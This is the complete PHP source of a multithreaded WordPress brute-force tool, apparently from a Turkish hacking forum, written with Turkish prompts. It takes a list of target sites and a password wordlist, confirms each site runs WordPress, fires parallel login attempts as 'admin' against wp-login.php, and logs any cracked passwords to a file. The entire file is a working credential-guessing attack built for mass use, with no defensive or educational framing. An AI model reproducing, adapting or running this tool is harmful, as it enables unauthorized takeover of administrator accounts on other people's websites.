<?php

/*
*	Janissaries Wordpress Brute Force Tool with MultiThread
*	Coded By Burtay
*	contact for questions : admin@burtay.org
*	Script Language : Turkish
*	Janissaries.Org
*	Video Tutorial : http://www.youtube.com/watch?v=dIoVglEZYYU
*/

error_reporting(0);
function multi($site,$postlar,$aranan,$aranan2)
{
	$toplam_post = count($postlar);
	$curl_multi  = curl_multi_init();
	for($i=0;$i<=$toplam_post-1;$i++)
	{
		$curl[$i]	= curl_init();
		curl_setopt($curl[$i],CURLOPT_URL,$site);
		curl_setopt($curl[$i],CURLOPT_RETURNTRANSFER,1);		
		curl_setopt($curl[$i],CURLOPT_HEADER,1);
		curl_setopt($curl[$i],CURLOPT_NOBODY,1);
		curl_setopt($curl[$i],CURLOPT_CONNECTTIMEOUT,20);
		curl_setopt($curl[$i],CURLOPT_TIMEOUT,20);
		curl_setopt($curl[$i],CURLOPT_POST,1);
		curl_setopt($curl[$i],CURLOPT_POSTFIELDS,$postlar[$i]);
		curl_setopt($curl[$i],CURLOPT_FOLLOWLOCATION,true);
		curl_multi_add_handle($curl_multi,$curl[$i]);
	}
 	do
	{
		curl_multi_exec($curl_multi,$durum);
	}
	while($durum>0);
	foreach($curl as $cid => $cson)
	{
		$sonuc[$cid] = curl_multi_getcontent($cson);	
		if(preg_match('/'.$aranan.'/',$sonuc[$cid]) and preg_match('/'.$aranan2.'/',$sonuc[$cid]))
		{
			return $cid+1;
			exit();
		}
	}
	for($i=0;$i<=$toplam_post-1;$i++)
	{
		curl_multi_remove_handle($curl_multi, $curl[$i]); 
		curl_close($curl[$i]); 
	}
	curl_multi_close($curl_multi); 
}

function dogrula($site)
{
	$curl	=	curl_init();
	curl_setopt($curl,CURLOPT_URL,$site);
	curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
	curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,20);
	curl_setopt($curl,CURLOPT_TIMEOUT,20);
	$calis	=	curl_exec($curl);
	curl_close($curl);
	if(preg_match('/wp-content/',$calis))
	{
		return true;
	}
	else
	{
		$site = str_replace('http://','',$site);
		echo "[+]".$site." Wordpress Olarak Dogrulanamadi...\n";
		echo "##################################\n\n\n";			
		return false;
	}
}

#-------------------------------------------------------------

echo "[+]Site listenizi Girin...\n";
// $site_list	=	$argv[1];
$site_list		=	fgets(STDIN);
$site_list		=	str_replace("\r\n",'',$site_list);
$site_list		=   trim($site_list);
// $wordlist	=	$argv[2];
echo "[+]Wordlist Dosyaninizi Girin...\n";
$wordlist		=	fgets(STDIN);
$wordlist		=	str_replace("\r\n",'',$wordlist);
$wordlist		=	trim($wordlist);
// $thread		=	$argv[3];
echo "[+]Thread Sayisini Girin...\n";
$thread			=	fgets(STDIN);
$thread			=	str_replace("\r\n",'',$thread);
// $timeout	=	$argv[4];
#----------------------------------------------------------------

$time1			=	time();
$siteler		=	file_get_contents($site_list);
$site_ayir		=	explode("\n",$siteler);
$say1			=	count($site_ayir);
$site_temizle	=	array_values(array_unique($site_ayir));
$say2			=	count($site_temizle);

echo "##################################\n";
echo "Janissaries.Org New Generation Security Forum\n";
echo "##################################\n";
echo "[+]Tarama Basladi\n";
echo "[+]Site Listesi -> $site_list\n";
echo "[+]Wordlist -> $wordlist\n";
echo "[+]Thread Sayisi $thread\n";
echo "[+]Yuklenen Site Sayisi ".count($site_ayir)." \n";
echo "[+]Aynı Siteler Listeden Siliniyor\n";
echo "[+]Tekrar Eden Site Sayisi ".(count($site_ayir) - count($site_temizle))." \n";
echo "[+]Temizleme Sonrasi Site Sayisi ".count($site_temizle)." \n\n";

$saygac	=	0;
foreach($site_temizle as $site)
{
	$saygac++;
	$site	=	trim($site);
	$a   	=  "##################################\n";
	$a  	.=  "[+]Denenen Site ".$site."	".$saygac."/".count($site_ayir)."\n";
	echo $a;
	if(!preg_match('/http/',$site)) $site = "http://".$site;
	 if( !dogrula($site) )
	 {continue;}
	$pass_oku	= file_get_contents($wordlist);
	$ay			= explode("\n",$pass_oku);
	$c  =  "[+]Yuklenen Password Sayisi ".count($ay)." \n";
	$c .=  "[+]Coded By Burtay |||| Janissaries.Org\n";
	echo $c;
	$pass_array		= array_chunk($ay,$thread);
	$thread_count	= count($pass_array);
	$saygac2		= 0;
	for($x=0;$x<=$thread_count-1;$x++)
	{		
		$saygac2	=	$saygac2 + $thread;
		$time3		=	time();
		$postlar	= array();
		foreach($pass_array[$x] as $password)
		{
			$post	=	"log=admin&pwd=".trim($password)."&redirect_to=".urlencode($site."&testcookie=1&wp-submit=Log In");
			array_push($postlar,$post);
		}
		$sonuc = multi( $site."/wp-login.php",$postlar,'wordpress_logged_in','Location');
		if($sonuc != null)
		{
			$time4 = time();
			$b =  "[+]Password Bulundu -> ".$pass_array[$x][$sonuc-1]. "\n";
			$b .= "[+]Sifrenin Kirilma Suresi -> ".($time4-$time3)."\n" ;
			$b .= "##################################\n\n\n";
			echo $b;
			yaz("wordpress_log.txt",$a.$c.$b);
			break;
		}
		elseif($x == $thread_count-1 )
		{
			echo "[+]Password bulunamadi...\n";
			echo "##################################\n\n\n";
		}
		unset($postlar);
	}	
}
$time2	=	time();
echo "Script Tamamlanma Suresi ".($time2 - $time1) ." Saniye";

function yaz($file,$content)
{
	$fopen = fopen($file,'ab');
	fwrite($fopen,$content);
	return $fopen;
}
?>